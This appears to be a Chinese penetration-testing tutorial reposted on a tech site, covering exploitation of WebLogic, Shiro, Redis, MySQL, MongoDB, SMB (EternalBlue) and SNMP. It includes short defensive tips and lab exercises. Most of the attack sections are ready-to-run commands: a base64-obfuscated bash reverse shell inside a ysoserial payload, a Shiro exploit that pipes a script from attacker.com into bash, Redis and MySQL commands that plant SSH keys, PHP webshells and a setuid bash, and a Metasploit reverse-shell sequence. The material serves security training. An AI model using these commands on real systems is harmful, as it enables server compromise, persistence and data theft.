服务攻防矩阵

4.1 中间件漏洞利用

WebLogic反序列化漏洞(CVE-2023-21839)
  • 漏洞原理

  • T3协议反序列化未严格校验,攻击者可注入恶意序列化对象执行任意代码。

  • 攻击流程

  1. 使用ysoserial生成CommonsCollections6 payload:

java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin 
  1. 通过T3协议发送payload:

python3 weblogic.py 192.168.1.100:7001 payload.bin 
  • 防御方案

  • 升级至官方补丁版本

  • 禁用T3协议或配置IP白名单

Shiro RememberMe反序列化(CVE-2016-4437)
  • 漏洞检测

  • 检查Cookie中rememberMe=deleteMe字段是否存在Shiro特征

  • 利用工具


python3 shiro_exploit.py -t http://target.com -p CommonsBeanutils1 -c "curl http://attacker.com/shell.sh | bash" 
  • 密钥爆破

  • 使用shiro_attack.jar加载常见密钥列表(如kPH+bIxk5D2deZiIxcaaaA==)

Redis未授权访问
  • 写SSH密钥

config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3NzaC1yc2E...\n\n" save 
  • 写WebShell

config set dir /var/www/html set shell "<?php @eval($_POST[cmd]);?>" config set dbfilename shell.php save 
  • 防御方案

  • 绑定127.0.0.1并设置强密码

  • 禁用CONFIG/SAVE等高危命令

实践任务
  • 使用Docker搭建Shiro 1.2.4靶场,利用默认密钥反弹Shell

  • 通过Redis未授权访问写入计划任务(/etc/crontab)实现持久化


4.2 数据库渗透

MySQL提权技术
  • UDF提权(Linux)
  1. 上传恶意so文件:

SELECT 0x7F454C46... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so' 
  1. 创建函数执行命令:

CREATE FUNCTION sys_exec RETURNS int SONAME 'udf.so'; SELECT sys_exec('chmod +s /bin/bash'); 
  • 日志文件写入WebShell

SET global general_log_file='/var/www/html/shell.php'; SET global general_log=on; SELECT '<?php system($_GET["cmd"]);?>'; 
MongoDB注入与未授权访问
  • NoSQL注入利用

// 原始查询 db.users.find({user: "admin", pass: "123"}) // 攻击载荷 db.users.find({user: "admin", pass: {"$ne": ""}}) 
  • 未授权访问利用

mongo 192.168.1.100:27017 > db.adminCommand({listDatabases:1}) > db.getUser("admin") 
防御方案
  • 最小化权限:数据库账户仅授予必要权限(禁止FILE_PRIV)

  • 网络隔离:数据库服务不暴露公网,限制访问IP

实践任务
  • 利用MySQL写入WebShell获取服务器权限

  • 通过MongoDB未授权访问导出用户数据


4.3 协议层漏洞

SMB永恒之蓝(MS17-010)
  • Metasploit利用

msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.200 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > exploit 
  • 手工检测

nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24 
SNMP弱口令与信息泄露
  • 社区名爆破

onesixtyone -c dict.txt 192.168.1.100 
  • 敏感信息提取

snmpwalk -v2c -c public 192.168.1.100 1.3.6.1.2.1.1.5.0 # 获取主机名 snmpwalk -v2c -c private 192.168.1.100 1.3.6.1.2.1.25.4.2.1.2 # 进程列表 
防御方案
  • 禁用SMBv1

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 
  • SNMP加固

  • 修改默认community名称

  • 配置ACL限制访问源

实践任务
  • 使用永恒之蓝攻击Windows 7靶机,获取SYSTEM权限

  • 通过SNMP协议提取目标设备的ARP表


技术整合与防御体系

企业级服务加固清单
  1. 中间件层
  • 定期更新至稳定版本

  • 删除默认管理页面(如Tomcat的/manager/html)

  1. 数据库层
  • 启用SSL加密通信

  • 审计数据库日志中的异常查询

  1. 协议层
  • 关闭非必要协议(如Telnet/FTP)

  • 部署网络IDS检测异常SMB流量

红队攻击链示例
  1. 通过Shiro反序列化获取Web服务器权限

  2. 利用Redis未授权访问横向跳转到数据库服务器

  3. 通过MySQL提权建立SSH隧道进入内网


学习建议

  1. 靶场环境:搭建Vulhub、VulnApp等集成化漏洞环境

  2. 武器库开发:编写自动化服务探测脚本(如SMB扫描器)

  3. 攻防演练:参与HTB(Hack The Box)中服务类靶机挑战

本部分内容将帮助学习者掌握企业级服务攻防核心技术,从单点漏洞利用进阶到APT级横向渗透,构建纵深防御体系。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/news/906659.shtml
繁体地址,请注明出处:http://hk.pswp.cn/news/906659.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PictureThis 解锁高级会员版_v5.3.0 拍植物知名称和植物百科

PictureThis 解锁高级会员版_v5.3.0 拍植物知名称和植物百科 PictureThis是一款创新的植物识别与园艺指导应用程序&#xff0c;旨在帮助用户快速识别植物种类、了解植物信息&#xff0c;并提供专业的园艺养护建议…

大模型 Agent 就是文字艺术吗?

最近在技术圈里有一个很有趣的争论&#xff1a;大模型 Agent 是不是就是各种 Prompt 的堆叠&#xff1f;像 Manus 这样看起来很智能的 Agent&#xff0c;本质上是不是就是用巧妙的 Prompt 约束大模型生成更好的输出&#xff1f;换句话说&#xff0c;这是不是一门文字艺术&#…

LeetCode 1340. 跳跃游戏 V(困难)

题目描述 给你一个整数数组 arr 和一个整数 d 。每一步你可以从下标 i 跳到&#xff1a; i x &#xff0c;其中 i x < arr.length 且 0 < x < d 。i - x &#xff0c;其中 i - x > 0 且 0 < x < d 。 除此以外&#xff0c;你从下标 i 跳到下标 j 需要满…

三相电压的优势,应用场景,功率测量

三相系统概述 我国三相系统&#xff0c;由频率相同&#xff0c;幅度类似的三个交流电压组成&#xff0c;每个电压相差120度。 三相系统的优势 启动电机&#xff1a;三个矢量间隔的电压&#xff0c;在电机中产生旋转磁场&#xff0c;不需要额外绕组就可以启动电机。 减少线损…

[原创](计算机数学)(The Probability Lifesaver)(P14): 推导计算 In(1-u) 约等于 -u

[作者] 常用网名: 猪头三 出生日期: 1981.XX.XX 企鹅交流: 643439947 个人网站: 80x86汇编小站 编程生涯: 2001年~至今[共24年] 职业生涯: 22年 开发语言: C/C++、80x86ASM、Object Pascal、Objective-C、C#、R、Python、PHP、Perl、 开发工具: Visual Studio、Delphi、XCode、…

Android12 Rom定制去掉剪贴板复制成功的Toast

Android12Rom定制去掉剪贴板复制成功的Toast提示 1.前言&#xff1a; 最近在rom定制化开发时&#xff0c;测试提了一个bug&#xff0c;在浏览器或者文本里面使用剪贴板复制成功后会有一个Toast提示&#xff0c;这种体验不是很好&#xff0c;因为每次复制成功都有一个提示&…

SOC-ESP32S3部分:9-GPIO输入按键状态读取

飞书文档https://x509p6c8to.feishu.cn/wiki/L6IGwHKV6ikQ08kqwAwcAvhznBc 前面我们学习了GPIO的输出&#xff0c;GPIO输入部分其实也是一样的&#xff0c;这里我们使用按键作为GPIO输入例程讲解&#xff0c;分三步走。 查看板卡原理图&#xff0c;确定使用的是哪个GPIO查看G…

高可用集群keepalived

1.不同操作系统的安装 1.1 不同系统编译安装 ubuntu环境 apt-get - y install libssl-dev libpopt-dev daemon build-essential libssl-dev openssl libpopt-dev libsnmp-dev libnl-3-dev libnl-genl-3-dev centos环境 &#xff08;其他的下同&#xff09; yum install - y…

SpringCloud - 整合MQ实现消息总线服务

一、背景介绍 每当修改配置文件内容&#xff0c;如果需要客户端也同步更新&#xff0c;就需要手动调用/refresh接口&#xff0c;以便客户端能获取到最新的配置内容。 当客户端越来越多的时候&#xff0c;通过人工进行处理显然非常鸡肋。有没有一种更加高效的办法&#xff0c;…

测试W5500的第3步_使用ioLibrary库创建TCPServer

W5500是一款具有8个Socket的网络芯片&#xff0c;支持TCP Server模式&#xff0c;最多可同时连接8个客户端。本文介绍了基于STM32F10x和W5500的TCP Server实现&#xff0c;包括SPI初始化、W5500复位、网络参数配置、Socket状态管理等功能&#xff0c;适用于需要多客户端连接的嵌…

Web攻防-SQL注入数据库类型用户权限架构分层符号干扰利用过程发现思路

知识点&#xff1a; 1、Web攻防-SQL注入-产生原理&应用因素 2、Web攻防-SQL注入-各类数据库类型利用 演示案例-WEB攻防-SQL注入-数据库类型&架构分层&符号干扰 一、数据库知识 1、数据库名&#xff0c;表名&#xff0c;列名&#xff0c;数据 2、自带数据库&…

手机合集(不定期更新)

一、华为手机&#xff1a; 1.华为手机自助维修的方法&#xff1a; https://blog.csdn.net/humors221/article/details/145946128 2.华为手机实用功能介绍&#xff1a; https://blog.csdn.net/humors221/article/details/132514011 3.华为手机清理大数据的方法&#xff1a;…

移动安全Android——ROOT检测绕过

工具准备 Magisk GitHub - topjohnwu/Magisk: The Magic Mask for Android ZygisckNext GitHub - Dr-TSNG/ZygiskNext at v1.2.8 Shamiko Releases LSPosed/LSPosed.github.io 安卓ROOT教程 Magisk 安装教程 - Magisk 中文网 问题 大多数手机在ROOT状态下会出现APP闪…

Python高效网络爬虫开发指南

Python 网络爬虫入门与实战 一、引言 随着互联网数据的爆炸性增长&#xff0c;获取和分析这些数据变得越来越重要。网络爬虫作为数据采集的重要工具&#xff0c;在这其中扮演了不可或缺的角色。 二、环境搭建 首先我们需要安装Python环境以及一些必要的库&#xff1a; req…

wireshark: Display Filter Reference

https://www.wireshark.org/docs/dfref/// 这个里面的扩展功能还是很强大&#xff0c;可以帮着问题分析。支持大量的自定义化的字段读取功能&#xff0c;支持很多的协议。 https://www.wireshark.org/docs/dfref///f/frame.html frame.time_delta Time delta from previous ca…

dify创建银行客服系统例子

传统的银行客服系统&#xff0c;通常以会话管理的方式实现&#xff0c;配置繁琐复杂&#xff0c;固定且不灵活。如&#xff1a; 智能体的出现&#xff0c;为实现银行客服系统提供了想象空间&#xff0c;可以集知识库和业务流程为一体实现灵活可控的智能客服系统&#xff0c;即能…

前端函数防抖(Debounce)完整讲解 - 从原理、应用到完整实现

&#x1f337; 古之立大事者&#xff0c;不惟有超世之才&#xff0c;亦必有坚忍不拔之志 &#x1f390; 个人CSND主页——Micro麦可乐的博客 &#x1f425;《Docker实操教程》专栏以最新的Centos版本为基础进行Docker实操教程&#xff0c;入门到实战 &#x1f33a;《RabbitMQ》…

服务接口鉴权与内部认证:自定义注解与AOP实现的企业级实践

本文深入解析企业级系统中接口安全管控的核心需求&#xff0c;提出基于Spring AOP与自定义注解的轻量级鉴权方案。通过解构注解元数据定义、切面拦截逻辑、上下文传递机制等关键技术环节&#xff0c;系统阐述零侵入式鉴权体系的构建路径。结合金融支付网关、多租户SaaS平台、物…

26考研|高等代数:线性变换

前言 线性变换这一章节是考频较高的一部分&#xff0c;此部分涉及考点较多&#xff0c;涉及的考题也较多&#xff0c;学习线性变换时&#xff0c;应该注意搭建线性变换与矩阵之间的联系&#xff0c;掌握如何利用矩阵表示一个线性变换结构&#xff0c;同时介绍了最简单的线性变…

电磁兼容(EMC)仿真(精编版)

写在前面 本系列文章主要讲解电磁兼容(EMC)仿真的相关知识,希望能帮助更多的同学认识和了解电磁兼容(EMC)仿真。 若有相关问题,欢迎评论沟通,共同进步。(*^▽^*) 随着产品复杂性和密集度的提高以及设计周期的不断缩短,在设计周期的后期解决电磁兼容性(EMC)问题变得…